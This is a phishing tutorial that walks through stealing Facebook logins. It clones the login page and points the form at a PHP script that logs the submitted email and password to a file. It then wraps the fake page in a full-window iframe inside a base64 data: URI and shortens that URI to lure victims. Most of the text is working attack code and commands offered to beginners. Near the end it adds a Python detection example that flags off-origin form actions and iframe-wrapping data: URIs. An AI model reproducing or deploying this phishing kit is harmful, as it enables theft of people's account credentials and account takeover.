This document describes how to perform a phishing attack that steals a facebook login account. The process is very simple and involves two main steps: creating a phishing page that imitates the facebook login page, and creating a phishing URI. This method is a useful reference if you are new to phishing.
I. Create a phishing page
For example, to steal a facebook login account, a total of three files are needed: index.html, login.php, and password.txt.
Step 1: Create an index.html login page
First, open the https://www.facebook.com page and copy its source code into the index.html file.
Edit the index.html file and find the login form:
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event && Event.__inlineSubmit && Event.__inlineSubmit(this,event)">
Change the value of action to:
action="login.php"
(login.php is the script used to steal the login account and password.)
Put index.html in the web directory. My files are stored in the /Library/WebServer/Documents/facebook directory.
Step 2: Create login.php, the script for stealing facebook accounts and passwords
<?php
header('location: https://www.facebook.com'); // jump to the real facebook page
$handle = fopen("password.txt", ""); // write the postdata submitted on the counterfeit page to the file
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "===================\r\n");
fclose($handle);
exit;
?>
Step 3: Create the password.txt file that receives the postdata
dani-2:facebook leedani$ pwd
/Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt
dani-2:facebook leedani$ sudo chmod a+w password.txt
Step 4: Test
Open http://localhost/facebook/
Enter an email and password, and click Login.
View the password.txt file:
dani-2:facebook leedani$ cat password.txt
The email and pass fields contain the facebook login account and password that were entered.
II. Create a phishing URI
Generally, phishing uses an iframe to cover the original page with the phishing page. The next operation is to generate a data: URI with this function and convert the URI to a short address.
Step 1: Generate attack code
The src attribute is the address where the phishing page is stored.
<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe>
Step 2: Convert the attack code to a data: URI
Open http://dopiaza.org/tools/datauri/index.php and paste the attack code.
The corresponding data: URI is:
data:text/plain;charset=UTF-8;base64,<base64-encoded content>
Change data:text/plain in the data: URI to data:text/html:
data:text/html;charset=UTF-8;base64,<base64-encoded content>
After opening the modified data: URI, the wrapped page is displayed. Clicking the facebook icon or the URL below it (Browse facebook.com) goes to the fake facebook logon page http://localhost/facebook/ that we created in step 1.
Step 3: Generate a short address for the data: URI
Obviously, this URI is too long and may arouse suspicion. In a real environment, it would first be converted to a short URL with a service such as http://tinyurl.com/ (which has since removed this service).
Finally, the victim is lured into clicking the URI, which leads to the phishing page that steals the account and password.
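The two indicators this tutorial relies on, a login form whose action no longer submits to the site's own origin (step 1 of Part I) and a data:text/html URI that wraps a page in a full-window iframe (Part II), can both be checked mechanically. The following is an added detection example, not code from the original article; the sample form and data: URI are constructed for the demonstration, and the hostname "www.facebook.com" is assumed as the legitimate login host.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _TagCollector(HTMLParser):
    # Collects form action and iframe src attributes from an HTML document.
    def __init__(self):
        super().__init__()
        self.form_actions, self.iframe_srcs = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "iframe" and a.get("src"):
            self.iframe_srcs.append(a["src"])

def suspicious_form_actions(html, page_url, legit_host):
    """Resolve each form action against the URL the page was served from and
    return those that would post credentials to a host other than legit_host.
    A relative action like login.php on a copied page resolves to the copy's host."""
    p = _TagCollector()
    p.feed(html)
    resolved = [urljoin(page_url, act) for act in p.form_actions]
    return [u for u in resolved if urlparse(u).hostname != legit_host]

def decode_data_uri(uri):
    """Return (mime, body) for a data: URI, or None if the string is not one."""
    m = re.match(r"data:([^;,]+)(;[^,]*)?,(.*)", uri.strip(), re.I | re.S)
    if not m:
        return None
    mime, params, payload = m.group(1).lower(), (m.group(2) or "").lower(), m.group(3)
    body = base64.b64decode(payload).decode("utf-8", "replace") if "base64" in params else payload
    return mime, body

def data_uri_iframe_hosts(uri):
    """For a data:text/html URI, return the hosts of the iframes it embeds."""
    decoded = decode_data_uri(uri)
    if decoded is None or decoded[0] != "text/html":
        return []
    p = _TagCollector()
    p.feed(decoded[1])
    return [urlparse(src).hostname for src in p.iframe_srcs]

# Constructed samples (not from the page): a copied form posting to login.php, and a data: URI wrapping an iframe.
SAMPLE_PAGE_HTML = '<form id="login_form" action="login.php" method="post"></form>'
SAMPLE_DATA_URI = "data:text/html;charset=UTF-8;base64," + base64.b64encode(
    b'<style>body{margin:0;overflow:hidden;}</style>'
    b'<iframe src="http://localhost/facebook/" width="100%">iFrame Failed</iframe>').decode()
```

A URL filter or mail gateway can apply the same two checks to links it sees: decode any data: URI, and flag text/html bodies whose iframes or forms point at a host other than the brand they imitate.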
Reference: http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/